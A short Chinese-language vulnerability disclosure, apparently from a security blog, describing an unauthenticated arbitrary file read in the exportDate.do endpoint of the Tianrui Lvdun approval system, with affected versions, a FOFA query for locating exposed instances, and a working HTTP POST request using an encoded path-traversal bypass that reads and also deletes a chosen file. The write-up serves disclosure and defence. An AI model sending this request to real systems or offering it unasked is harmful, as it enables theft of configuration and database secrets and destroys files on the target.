漏洞简介
天锐绿盾审批系统是一款专注于企业数据安全与合规管理的智能审批平台,深度融合文档加密、权限管控与流程自动化,为企业提供从文件创建、流转到归档的全生命周期安全管控。
该系统的 exportDate.do 接口存在任意文件读取漏洞。未经身份验证的攻击者可以通过该漏洞读取系统上的任意文件,从而可能获取数据库敏感信息或其他重要配置信息,导致数据泄露。
影响版本
可通过访问 /trwfe/exports/config.ini 获取版本信息
V3.53.240913
V7.05.240904
fofa语法
app="TIPPAY-绿盾审批系统"
漏洞分析


调试信息中可知


直接将name参数的值作为文件操作的最终路径进行读取,无任何过滤或者校验措施,因此造成了任意文件读取漏洞。
漏洞复现
谨慎测试!会删除读取文件
POST /trwfe/login.jsp/.%2e/config/exportDate.do HTTP/1.1
Host: trwfe.mrxn.net
Content-Type: application/x-www-form-urlencoded
name=c:\a.txt

成功读取到c:\a.txt文件内容
当然,同时读取后的文件也被删除了!

